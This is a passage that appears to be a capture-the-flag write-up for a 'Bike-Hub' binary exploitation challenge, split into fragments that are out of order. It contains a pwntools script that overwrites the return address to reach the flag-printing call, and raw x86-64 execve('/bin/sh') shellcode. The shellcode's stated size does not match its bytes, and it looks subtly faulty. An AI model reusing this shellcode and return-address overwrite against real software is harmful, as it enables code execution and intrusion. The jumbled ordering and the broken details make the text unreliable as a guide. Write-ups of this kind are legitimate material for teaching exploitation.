=== Welcome to the HD Bike Hub === Enter your hub key: flagh0p3_y0u_f0und_th3_h1d3_b1k3 Success! The flag is printed without ever passing the check_key test. If you prefer a “classic” shellcode approach, you can place a /bin/sh payload on the stack and return to it.
Challenge name: hdhub4ubike CTF: 2023 – BicycleCTF (the “Bike‑Hub” event) Category: Pwn / Binary Exploitation Points: 400 (medium) Author: unknown 1️⃣ Challenge Overview The provided artifact is a 64‑bit ELF executable named hdhub4ubike . When executed it prints a short banner and then prompts the user for a “bike‑hub key”. If the key is correct, the program prints the flag; otherwise it terminates with “Invalid key!” .
puts(flag); return 0;
p.sendline(payload.decode('latin-1')) # send as a line p.interact() # hand over the terminal
# 32‑byte execve("/bin/sh") shellcode (x86‑64) shellcode = ( b"\x48\x31\xd2" # xor rdx, rdx b"\x48\x31\xf6" # xor rsi, rsi b"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00" # movabs rdi, "/bin/sh" b"\x57" # push rdi b"\x48\x89\xe7" # mov rdi, rsp b"\xb0\x3b" # mov al, 0x3b b"\x0f\x05" # syscall ) hdhub4ubike
The goal is to obtain the flag without knowing the correct key. 2.1 File information $ file hdhub4ubike hdhub4ubike: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped, for GNU/Linux 3.2.0, BuildID[sha1]=...
BIN = "./hdhub4ubike" TARGET_ADDR = 0x004011a6 # address of the "puts" call that prints the flag === Welcome to the HD Bike Hub ===
// compare with a secret stored in the .rodata section if (strcmp(key, secret_key) != 0) return 0;